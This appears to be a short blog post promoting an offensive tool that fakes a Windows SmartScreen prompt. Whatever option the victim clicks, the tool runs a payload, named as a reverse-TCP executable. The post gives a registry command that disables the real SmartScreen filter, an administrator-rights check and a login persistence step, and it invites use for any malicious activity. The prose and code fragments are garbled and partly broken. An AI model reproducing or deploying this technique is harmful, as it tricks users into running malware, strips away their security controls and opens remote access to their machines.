payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter
All options allow for the execution of an execution, and this can be used in a different way, such as opening a port in a Windows machine, or doing it in a different way. can equate the value of any option to any malicious activity want.
This exploit allows you to make payload executeion and create execution of administrator privileges by simulating the Windows Smart Screen by clicking any option in the window such as Don’t run or (X) to close the window with stop the real smartscreen filter
1.Payload executeion : def dont_run_action(): = other_command = r’C:\Users\username\ReverseTCP.exe’
2.Administrator privileges : return ctypes.windll.shell32.IsUserAnAdmin()
3.Stop the real smartscreen filter : os.system(‘reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v “EnableSmartScreenFilter” /t REG_DWORD /d “0” /f’)
4.The registry entry is intended to run the script (sys.argv[0]) every time the user logs in
What do you think?
It is nice to know your opinion. Leave a comment.